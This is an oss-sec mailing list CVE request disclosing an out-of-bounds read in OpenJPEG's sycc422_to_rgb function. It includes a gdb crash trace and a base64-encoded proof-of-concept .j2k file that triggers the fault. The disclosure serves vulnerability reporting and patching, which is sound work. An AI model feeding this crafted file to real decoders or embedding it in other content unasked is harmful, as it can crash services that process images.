oss-sec mailing list archives
CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function
From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:58 +0000
Hi all, I find a vulnerability of OpenJPEG. The specific flaw exists within the sycc422_to_rgb function. A specially crafted JPEG2000 image file can force Out-Of-Bounds Read occurring in OpenJPEG. This issue can be reproduced in the latest version of OpenJPEG (https://github.com/uclouvain/openjpeg 2016.03.14). The detailed information about this issue can be described as follows. --------------------------------- winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q Reading symbols from opj_decompress...(no debugging symbols found)...done. (gdb) r -o image.pgm -i oob_sycc422_to_rgb.j2k Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_sycc422_to_rgb.j2k [INFO] Start to read j2k main header (0). [INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image [INFO] Header of tile 1 / 97 has been read. [INFO] Tile 1/97 has been decoded. [INFO] Image data has been updated with tile 1. Program received signal SIGSEGV, Segmentation fault. 0x08058a42 in sycc422_to_rgb () (gdb) bt #0 0x08058a42 in sycc422_to_rgb () #1 0x08059227 in color_sycc_to_rgb () #2 0x0804c49f in main () (gdb) x /i $eip => 0x8058a42 <sycc422_to_rgb+430>: mov (%eax),%ecx (gdb) i r eax 0x815c000 135643136 ecx 0x0 0 edx 0x0 0 ebx 0xb7d7ddcc -1210589748 esp 0xbfff9ed0 0xbfff9ed0 ebp 0xbfff9f38 0xbfff9f38 esi 0x0 0 edi 0x0 0 eip 0x8058a42 0x8058a42 <sycc422_to_rgb+430> eflags 0x10297 [ CF PF AF SF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x /40xb $eax-0x20 0x815bfe0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x815bfe8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x815bff0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x815bff8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x815c000: Cannot access memory at address 0x815c000 The attachment is the proof-of-concept file. Alternatively, you can decode the following string using base64 and save the decoded content to a .j2k file. --------------------------------- /0//UQAvAAAAAACAAAAwgAAAAHsAAAAAAAAAgAAAAIAAAAAAAAAAAAADBwEBBwIBBwIB/1IAEgEA AAMABQMDAAEzRFVmd3f/XAATQEBISFBISFBISFBISFBISFD/ZABCAAFDcmVhdGVkIGJ5IE9QSlZp ZXdlciBXaW4zMiAtIE9wZW5KUEVHICB2ZXJzaW9uIDEuMi4wIHdpdGggSlBXTP+QAAoAAAAAAKYA Af9TAA8BAQUDAwABM0RVZnd3/10AFAFAQEhIUEhIUEhIUEhIUEhIUP9TAA8CAQUDAwABM0RVZnd3 /10AFAJAQEhIUEhIUEhIUEhIUEhIUP+Tz6QgEVBUr8+YKBFQVKMDz4woEVBUoOKAgICAgICAgICA gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID/2Q== CREDIT: This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment:
oob_sycc422_to_rgb.j2k
Description: oob_sycc422_to_rgb.j2k
Current thread:
- CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function cve-assign (Mar 16)